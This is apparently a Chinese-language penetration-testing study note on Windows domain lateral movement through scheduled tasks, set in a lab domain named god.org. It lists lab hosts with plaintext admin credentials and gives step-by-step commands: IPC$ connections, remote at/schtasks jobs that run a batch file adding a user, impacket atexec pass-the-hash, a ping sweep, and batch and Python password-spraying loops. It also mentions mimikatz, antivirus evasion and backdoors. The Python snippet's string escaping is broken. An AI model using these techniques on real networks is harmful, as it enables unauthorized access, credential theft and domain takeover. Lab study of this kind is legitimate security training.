内网渗透学习(三)域横向移动——计划任务
环境准备:
2008 r2 webserver
域内 web 服务器
本地管理员账号密码 :
.\administraotr:admin!@#45
当前机器域用户密码 :
god\webadmin:admin!@#45
2003 x86 fileserver
域内文件服务器
本地管理员账号密码 :
administrator : admin
当前机器域用户密码 :
god\fileadmin : Admin12345
2008 r2 x64 dc god.org
主域控机器
域管账号密码:
God\administrator : Admin12345
2012 sqlserver
域内数据库服务器
本地管理员账号密码 :
.\administrator:admin!@#45
当前机器域用户密码 :
god\dbadmin:admin!@#45
w7 x64 mary-pc
域内个人机
本地管理员账号密码 :
.\mary : admin
当前机器域用户密码 :
god\mary : admin!@#45
w8.1 x64 jack-pc
域内个人机
本地管理员账号密码 :
.\jack : admin
当前机器域用户密码 :
god\boss : Admin12345
一、计划任务
1.介绍
(1)计划任务简介
windows 有一个任务计划程序,可以打开这个程序,创建定时的任务。windows 提供了两个命令行可以创建计划任务,分别是 at 和 schtasks。在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
适用系统:
at:< Windows2012
schtasks:>=Windows2012
(2)IPC 简介
IPC$(Internet Process Connection)是共享 "命名管道 "的资源,它是一个用于进程间通信的开放式命名管道,通过提供一个可信的用户名和密码,连接双方可以建立一个安全通道并通过这个通道交换加密数据,从而实现对远程计算机的访问。
IPC 连接的简单使用:
建立 IPC 连接
net use \\IP地址\ipc$ "password" /user:"administrator"
通过 IPC 传文件
copy 文件名 \\IP地址\目录$
查看对方电脑时间
net time \\IP地址
定时运行程序
at \\IP地址 时间 文件名
断开 IPC 连接
net use \\IP地址 /del
建立 IPC 失败的原因:
- 目标系统不是 Windows NT 或以上的操作系统
- 对方没有打开IPC$共享
- 对方未开启139,445端口,或者被防火墙屏蔽
- 输出命令,账号密码有错误
(3)利用流程
- 建立 IPC 链接到目标主机
- 拷贝要执行的命令脚本到目标主机
- 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
- 删除 IPC 链接
2.演示
(1)明文传递(at&schtasks)
①at 命令演示
创建 add.bat 文件,将下列命令写入,表示创建名为 zzz 密码为 Admin123$%. 的账户
net user zzz Admin123$%. /add
建立 ipc 连接
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator
拷贝执行文件到目标机器
copy add.bat \\192.168.3.21\c$
添加计划任务
at \\192.168.3.21 15:47 c:\add.bat
去域控查看发现 zzz 用户已被成功添加
②schtasks 命令演示
建立ipc连接
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
复制文件到其 C 盘
copy add.bat \\192.168.3.32\c$
创建 adduser 任务对应执行文件
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F
运行 adduser 任务
schtasks /run /s 192.168.3.32 /tn adduser /i
执行命令
进入 win2012 主机查看,任务执行成功,zzz 用户被成功添加
(2)哈希传递(atexec.exe)
以上两个命令都是建立在明文密码的传递,那哈希值该如何传递?
可以使用 impacket 中的 atexec.exe
优点:既可以用明文传输也可以使用hash传输,能自动提权
缺点:非官方软件,需要做免杀
exe 版本下载地址:https://github.com/maaaaz/impacket-examples-windows
atexec.exe 使用
atexec.exe ./[用户名]:[密码]@[IP] "[命令]"
atexec.exe [域名]/[用户名]:[密码]@[IP] "[命令]"
atexec.exe -hashes [密码的hash值] ./[用户名]@[IP] "[命令]"
如图明文和哈希值均可传递,并且连接后自动提权
二、批量验证
以上两次演示都是建立在我们已经知道密码的情况下,实战过程使用mimikatz获取本机密码然后检测其它主机是否也使用了该密码,这需要我们去批量验证
1.Windows 批处理文件
什么是批处理文件?
批处理文件(batch file)包含一系列 DOS 命令,通常用于自动执行重复性任务。用户只需双击批处理文件便可执行任务,而无需重复输入相同指令。
批处理验证演示
(1)创建 ip 地址字典
探针域内存活主机地址信息
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="
创建 ips.txt,将收集的ip地址写入
(2)创建批处理文件
创建名为 at_ip.bat 的文件,将如下命令写入
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator
该命令含义:对 ips.txt 中的每一个 ip 地址,使用 IPC 进行连接
(3)开始检测
执行创建好的at_ip.bat脚本
at_ip.bat
192.168.3.331是本机 ip 地址,从图中可以验证出192.168.3.29和192.168.3.32这两台主机的administrator 的密码为 admin!@#45
思路:
从上面的演示中,可以得到域横向移动的思路,获取到 web 服务器的 administrator 的密码之后,通过批量 ipc 连接,查看同一个域下有没有相同的密码,然后再在其它域内主机中使用 mimikatz 丰富密码字典,最终对域控制器进行密码爆破得到域控权限。
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令
2.脚本使用
为什么要使用脚本?
使用windows批处理命令,对多个变量进行遍历较为麻烦,而我们需要对 ip、用户名、密码、哈希一起爆破,就需要利用脚本进行批量处理。
思路:
使用 python 写脚本,利用第三方软件将其转换为 exe 文件,再对其进行免杀,上传至
我们控制的主机运行,实现批量验证
python 代码实例
点击查看代码
import os,time
ips={
#域内ip地址
}
users={
#收集的用户名
}
passs={
#收集的密码
}
for ip in ips:
for user in users:
for mima in passs:
exec="net use \"+ "\"+ip+'\ipc$ '+mima+' /user:god\'+user
print('--->'+exec+'<---')
os.system(exec)
